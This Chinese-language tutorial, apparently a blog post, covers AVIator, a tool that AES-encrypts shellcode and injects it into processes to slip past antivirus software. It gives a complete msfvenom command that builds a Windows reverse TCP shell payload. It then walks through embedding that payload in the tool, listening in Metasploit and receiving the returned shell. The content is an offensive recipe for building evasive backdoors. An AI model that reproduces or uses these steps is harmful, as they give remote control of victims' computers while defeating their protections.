前提概要
项目地址:https://github.com/Ch0pin/AVIator
AV:全名为AntiVirus,意指为防病毒软件
AVIator是一个后门生成器实用程序,它使用加密和注入技术来绕过AV检测。进一步来说:
- 它使用AES加密来加密给定的shellcode
- 生成包含加密有效负载的可执行文件
- 使用各种注入技术将shellcode解密并注入目标系统
-
便携式可执行注入,包括将恶意代码直接写入进程(没有磁盘上的文件),然后使用其他代码或通过创建远程线程调用执行。注入代码的位移引入了重新映射内存引用的功能的附加要求。这种方法的变化,例如反射DLL注入(将自映射DLL写入进程)和内存模块(写入进程时映射DLL)克服了地址重定位问题。
-
线程执行劫持涉及将恶意代码或DLL的路径注入进程的线程。与Process Hollowing类似,必须首先暂停该线程。
工具界面:
注入功能:
利用过程
工具编译是由三部分组成
- 包含用于加密shellcode的加密密钥的文本
- 包含用于AES加密的IV的文本
- 包含shellcode的文本
其中shellcode部分是利用csharp组成的字节码
利用msf生成payload:
msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=4444 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp
将生成的字节码copy放到工具当中
然后按照如下步骤生成
随后在MSF中监听
其中RC4PASSWORD的值是之前msfvenom中设置的密码
直接运行,并在msf接受反弹回来的shell
当explorer下的cmd.exe进程结束的时候,explorer父进程也将终结